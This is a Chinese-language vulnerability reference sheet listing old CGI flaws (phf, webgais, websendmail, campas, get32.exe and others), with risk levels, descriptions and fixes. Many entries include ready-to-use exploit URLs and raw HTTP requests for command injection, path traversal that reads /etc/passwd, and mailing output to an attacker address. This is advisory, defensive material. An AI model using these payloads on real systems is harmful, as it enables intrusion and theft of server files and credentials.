CGI安全漏洞資料速查v1.0
################################################################
#如有任何安全組織或個人願意無嘗對此文進行長期的、不間斷地維護、
更新或更改。請自行隨便,不必與我商討.但要求是成果必須完全地向
internet公開。任何行為的私藏都是不受歡迎的。
#本文歡迎轉摘.但請保持這些聲明。
#如有任何問題或建議,請mailto:iwillsurewin@163.net
################################################################
類型:攻擊型
名字:phf
風險等級:中
描述:在NCSA或者Apache(1.1.1版本以內)非商業版本的WebServer中
有一段程序util.c,允許黑客以root身份執行任何一個指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建議:無
解決方法:把Apachewebserver升級到1.1.1以上,或者將NCSAwebserver
升級到最新版本
類型:攻擊型
名字:wguset.exe
風險等級:中
描述:如果您使用NT做為您的WebServer的操作系統,而且wguest.exe存
在於您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬
盤上所有USR_用戶能閱讀的文件
建議:將wguset.exe從你的Web目錄移走或刪除
解決方法:將wguset.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:rguset.exe
風險等級:中
描述:如果您使用NT做為您的WebServer的操作系統,而且rguest.exe存
在於您的Web可執行目錄中的話,入侵者將能利用它閱讀到您的硬
盤上所有USR_用戶能閱讀的文件
建議:將rguset.exe從你的Web目錄移走或刪除
解決方法:將rguset.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:perl.exe
風險等級:低
描述:在cgi-bin執行目錄下存在perl.exe,這屬於嚴重的配置錯誤。黑客
可以在perl.exe後面加一串指令,利用瀏覽器在server上執行任何
腳本程序
建議:perl.exe是放在任何帶執行權限的web目錄下都是不安全的
解決方法:在web目錄下移除perl.exe這個程序.
類型:攻擊型
名字:shtml.exe
風險等級:低
描述:如果您使用FrontPage作為您的WebServer,那麼入侵者能夠利用
IUSR_用戶和shtml.exe入侵您的機器,做您不希望的事
建議:將shtml.exe從你的Web目錄移走或刪除
解決方法:將shtml.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:wwwboard.pl
風險等級:低
描述:wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊
建議:如無必要可以刪除該文件
解決方法:對get_variables的子程序中的下面這段:
if($FORM{'followup'}){$followup="1";
@followup_num=split(/,/,$FORM{'followup'});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate="$FORM{'origdate'}";
$origname="$FORM{'origname'}";
$origsubject="$FORM{'origsubject'}";}
替換為:
if($FORM{'followup'}){
$followup="1";
@followup_num=split(/,/,$FORM{'followup'});
$num_followups=@followups=@followup_num;
$last_message=pop(@followups);
$origdate="$FORM{'origdate'}";
$origname="$FORM{'origname'}";
$origsubject="$FORM{'origsubject'}";
#WWWBoardBombPatch
#WrittenBy:SamuelSparlingsparling@slip.net)
$fn=0;
while($fn<$num_followups)
{
$cur_fup=@followups$fn];
$dfn=0;
foreach$fm(@followups)
{
if(@followups[$dfn]==@followups[$fn]&&$dfn!=$fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
#EndWWWBoardBombPatch
}
類型:攻擊型
名字:uploader.exe
風險等級:中
描述:如果您使用NT作為您的WebServer的操作系統,入侵者能夠利用
uploader.exe上傳任何文件
建議:將uploader.exe從你的Web目錄移走或刪除
解決方法:將uploader.exe從你的Web目錄移走或刪除
類型:攻擊型
名字:bdir.htr
風險等級:高
描述:如果您使用NT做為您的WebServer的操作系統,而且bdir.htr存在
於您的Web可執行目錄中的話,入侵者將能利用它在您的服務器上
無止境的創建ODBC數據庫,並生成一些可執行的文件。
建議:將bdir.htr從你的Web目錄移走或刪除
解決方法:將bdir.htr從你的Web目錄移走或刪除
類型:攻擊型
名字:Count.cgi
風險等級:高
描述:在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出
錯誤,允許入侵者無須登錄而遠程執行任何指令。
建議:如無必要可以刪除該文件
解決方法:將wwwcount升級到2.4或者以上
類型:攻擊型
名字:test-cgi
風險等級:高
描述:test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
解決方法:刪除test-cgi文件
類型:攻擊型
名字:nph-test-cgi
風險等級:高
描述:nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息
建議:建議審核cgi-bin目錄下的執行程序,嚴格控制訪問權限
解決方法:刪除nph-test-cgi文件
類型:攻擊型
名字:php.cgi
風險等級:低
描述:php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系
統文件可以被入侵者讀取的漏洞
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除php.cgi程序是最好的辦法
類型:攻擊型
名字:handler
風險等級:低
描述:IRIX5.3,6.2,6.3,6.4的/cgi-bin/handler程序存在緩存溢出
錯誤,允許入侵者在server上遠程執行一段程序:
telnettarget.machine.com80
GET/cgi-bin/handler/whatever;cat/etc/passwd|?data=Download
HTTP/1.0
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除handler文件
類型:攻擊型
名字:webgais
風險等級:高
描述:/cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個
毛病使入侵者可以繞過程序的安全機制,執行系統命令:
POST/cgi-bin/webgaisHTTP/1.0
Content-length:85(replacethiswiththeactuallengthof
the"exploit"line)
telnettarget.machine.com80query=';mail+you\@your.host
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除webgais文件
類型:攻擊型
名字:websendmail
風險等級:高
描述:/cgin-bin目錄下的websendmail程序允許入侵者執行一個系統指令:
telnettarget.machine.com80
POST/cgi-bin/websendmailHTTP/1.0
Content-length:xxx(shouldbereplacedwiththeactual
lengthofthestringpassedtotheserver,inthiscase
xxx=90) receiver=;mail+your_address\@somewhere.org
&content=a
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:高級用戶:編輯websendmail腳本,過濾特殊字符
一般用戶:刪除websendmail文件
類型:攻擊型
名字:webdist.cgi
風險等級:高
描述:對於Irix6.2和6.3平台,/cgi-bin目錄下的webdist.cgi有一個弱點
允許入侵者無須登錄而在系統上執行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi
類型:攻擊型
名字:faxsurvey
風險等級:高
描述:在LinuxS.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無
須登錄就能在服務器執行指令:http://joepc.linux.elsewhere.org/
cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/faxsurvey文件
類型:攻擊型
名字:htmlscript
風險等級:中
描述:安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使
入侵者可以查看服務器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../
../../etc/passwd
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到
3.0以上
類型:攻擊型
名字:pfdisplay
風險等級:中
描述:在Irix6.4或者更早版本的web服務器上,/cgi-bin/pfdisplay程序
允許入侵者非法查看服務器上的文件
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/pfdisplay文件,或者打補丁,補丁可以去
sgigate.sgi.com(204.94.209.1)或者ftp.sgi.com下載:
Filename:README.patch.3018
Algorithm#1(sum-r):3795511README.patch.3018
Algorithm#2(sum):1545511README.patch.3018
MD5checksum:1169EB51D75E0794C64C2C1FD6211B69
Filename:patchSG0003018
Algorithm#1(sum-r):016792patchSG0003018
Algorithm#2(sum):128762patchSG0003018
MD5checksum:BD16A53A0AE693D6E9E276EE066BDBC8
Filename:patchSG0003018.idb
Algorithm#1(sum-r):013392patchSG0003018.idb
Algorithm#2(sum):2512patchSG0003018.idb
MD5checksum:1CB16E6A8C50BF17CD02A29C2E4D35EB
Filename:patchSG0003018.performer_tools_man
Algorithm#1(sum-r):102018patchSG0003018.per-
-former_tools_man
Algorithm#2(sum):31448patchSG0003018.performer_t-
-ools_man
MD5checksum:B6B3D90FAB9B5A342397C3E5AF5A8D29
Filename:patchSG0003018.performer_tools_sw
Algorithm#1(sum-r):4847418patchSG0003018.perform-
-er_tools_sw
Algorithm#2(sum):2817618patchSG0003018.performer_
tools_sw
MD5checksum:DF4E8ED8326A6A0B39F7B4D67E5FD71F
類型:攻擊型
名字:www-sql
風險等級:中
描述:www-sql存在於/cgi-bin/目錄下,這將導致入侵可以越權訪問被保
護的文件
建議:最好刪除www-sql文件
解決方法:#ifPHPFASTCGI
while(FCGI_Accept()>=0)
{
#endif
s=getenv("REDIRECT_STATUS");
if(!s){
puts("Content-type:text/plain\r\n\r\nPHP/FIdetected
aninternalerror.Pleaseinformsa@hogia.netofwhat
youjustdid.\n");
exit(1);
}
s=getenv("PATH_TRANSLATED");
類型:攻擊型
名字:view-source
風險等級:高
描述:在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使
入侵者可以查看服務器上的任何文件
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的viewsource程序
類型:攻擊型
名字:campas
風險等級:高
描述:在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看
server上的重要文件:
telnetwww.xxxx.net80
Trying200.xx.xx.xx...
Connectedtovenus.xxxx.net
Escapecharacteris'^]'.
GET/cgi-bin/campas?%0acat%0a/etc/passwd%0a
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的campas程序
類型:攻擊型
名字:aglimpse
風險等級:高
描述:在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登
錄而隨意執行任何指令
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的aglimpse程序
類型:攻擊型
名字:AT-admin.cgi
風險等級:中
描述:在ExciteforWebServers1.1上的/cgi-bin/AT-admin.cgi程序,允
許普通用戶完全控制整個系統
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的AT-admin.cgi程序
類型:攻擊型
名字:finger
風險等級:中
描述:這個位於/cgi-bin下的finger程序,可以查看其它服務器的信息,
但是如果將參數改成本機,本機上的帳號信息將暴露無遺:
/cgi-bin/finger?@localhost
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin目錄下的finger程序
類型:攻擊型
名字:webwho.pl
風險等級:中
描述:如果在您的Web可執行目錄中有webwho.pl這個CGI腳本,那麼入侵
者將能利用他閱讀啟動Web的用戶能讀寫執行的任何文件。
建議:將webwho.pl從您的Web目錄中刪除或移走
解決方法:將webwho.pl從您的Web目錄中刪除或移走
類型:攻擊型
名字:w3-msql
風險等級:低
描述:MiniSQL軟件包發行版本附帶的一個CGI(w3-msql)可被用於以
httpd的uid權限執行任意代碼。這個安全漏洞是由程序中的scanf()
函數引起的。
建議:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql文
件刪除或移走
解決方法:如果您安裝了MiniSQL軟件包,請您將/cgi-bin/目錄下的w3-msql
文件刪除或移走.或使用以下補丁。
補丁:
------w3-msql.patch---------
410c410
scanf("%s",boundary); <br>---
<scanf("%128s",boundary);>
418c418
<strcat(var,buffer);
<strncat(var,buffer,sizeof(buffer));
428c428
<scanf("Content-Type:%s",buffer);>
<scanf("Content-Type:%15360s",buffer);>
------w3-msql.patch---------
類型:攻擊型
名字:NetscapeFastTrackserver2.0.1a
風險等級:中
描述:UnixWare7.1附帶的NetscapeFastTrackserver2.0.1a存在一個遠程
緩衝區溢出漏洞。缺省地,監聽457端口的httpd通過http協議提供
UnixWare文檔。如果向該服務器傳送一個長度超過367字符的GET請
求,會使緩衝區溢出,EIP值被覆蓋將可能導致任意代碼以httpd權
限執行。
建議:臨時解決方法是關閉NetscapeFastTrack服務器
解決方法:臨時解決方法是關閉NetscapeFastTrack服務器。
類型:攻擊型
名字:AnyForm.cgi
風險等級:高
描述:位於cgi-bin目錄下的AnyForm.cgi程序,是用於簡單表單通過郵件
傳遞響應的,但該程序對用戶輸入檢查不徹底,可被入侵者利用,
在server上執行任何指令.
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:建議升級該cgi程序,或者刪除該文件
類型:攻擊型
名字:whois.cgi
風險等級:低
描述:在多個WebServer中帶有的Whois.cgi存在溢出漏洞。它們包括:
WhoisInternicLookup-version:1.02
CCWhois-Version:1.0
Matt'sWhois-Version:1
他們將使入侵者能夠在您的系統上使用啟動httpd用戶的權限執行任
意的代碼
建議:將在您Web目錄中問whois.cgi刪除或移走
解決方法:將在您Web目錄中問whois.cgi刪除或移走
類型:攻擊型
名字:environ.cgi
風險等級:中
描述:在Apachewebserver或者IIS等其它webserver的/cgi-bin/environ.cgi
程序,有一個毛病允許入侵者繞過安全機制,瀏覽服務器上的一些
文件。
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:建議升級該cgi程序,或者刪除該文件
類型:攻擊型
名字:wrap
風險等級:中
描述:/cgi-bin/wrap程序有兩個漏洞,均允許入侵者獲取服務器上文件
的非法訪問,如:
http://host/cgi-bin/wrap?/../../../../../etc
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/wrap文件
類型:攻擊型
名字:edit.pl
風險等級:中
描述:/cgi-bin/edit.pl有一個安全弱點,用下面這條命令就可以訪問用
戶的配置情況:
http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=
建議:建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法:刪除/cgi-bin/edit.pl文件
類型:攻擊型
名字:service.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/service.pwd可讀,
將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootservice.pwd chmod700service.pwd
類型:攻擊型
名字:administrators.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/administrators.pwd
可讀,將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootadministrators.pwd chmod700administrators.pwd
相關連接:
類型:攻擊型
名字:users.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/users.pwd可讀,
將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootusers.pwd chmod700users.pwd
類型:攻擊型
名字:authors.pwd
風險等級:中
描述:UNix系統的http://www.hostname.com/_vti_pvt/authors.pwd可讀,
將暴露用戶密碼信息
建議:建議刪除
解決方法:chownrootauthors.pwd chmod700authors.pwd
類型:攻擊型
名字:visadmin.exe
風險等級:中
描述:在OmniHTTPdWebServer的cgi-bin目錄下存在這個文件visadmin.exe,
那麼攻擊者只要輸入下面的命令:
http://omni.server/cgi-bin/visadmin.exe?user=guest數分鐘之
後服務器的硬盤將會被撐滿
建議:建議刪除
解決方法:把visadmin.exe從cgi-bin目錄中刪除
類型:攻擊型
名字:get32.exe
風險等級:高
描述:Alibaba的webserver,其cgi-bin目錄存在get32.exe這個程序,允
許入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com
建議:建議刪除
解決方法:把GET32.exe從cgi-bin目錄中刪除
類型:攻擊型
名字:alibaba.pl
風險等級:高
描述:Alibaba的webserver,其cgi-bin目錄存在alibaba.pl這個程序,允
許入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/alibaba.pl|dir
建議:建議刪除
解決方法:把alibaba.pl從cgi-bin目錄中刪除
類型:攻擊型
名字:tst.bat
風險等級:高
描述:Alibaba的webserver,其cgi-bin目錄存在tst.bat這個程序,允許
入侵者任意執行一條指令:
http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini
建議:建議刪除
解決方法:把tst.bat從cgi-bin目錄中刪除
類型:攻擊型
名字:fpcount.exe
風險等級:低
描述:如果您使用NT作為您的WebServer的操作平台,並只安裝了SP3補丁,
那麼入侵者能利用這個CGI程序進行DoS攻擊,使您的IIS服務拒絕
訪問。
建議:將在您Web目錄中的fpcount.exe刪除或移走
解決方法:將在您Web目錄中的fpcount.exe刪除或移走
類型:攻擊型
名字:openfile.cfm
風險等級:低
描述:如果在您的Web目錄中含有
/cfdocs/expeval/exprcalc.cfm
/cfdocs/expeval/sendmail.cfm
/cfdocs/expeval/eval.cfm
/cfdocs/expeval/openfile.cfm
/cfdocs/expeval/displayopenedfile.cfm
/cfdocs/exampleapp/email/getfile.cfm
/cfdocs/exampleapp/publish/admin/addcontent.cfm
這些文件,那麼入侵者可能能夠利用它們讀到您系統上的所有文件
建議:將在您Web目錄中的openfile.cfm刪除或移走
解決方法:將在您Web目錄中的openfile.cfm刪除或移走
|
|
當前位置:開發者網絡 >> 技術教程 >> CGI教程 >> CGI文檔 >> 內容
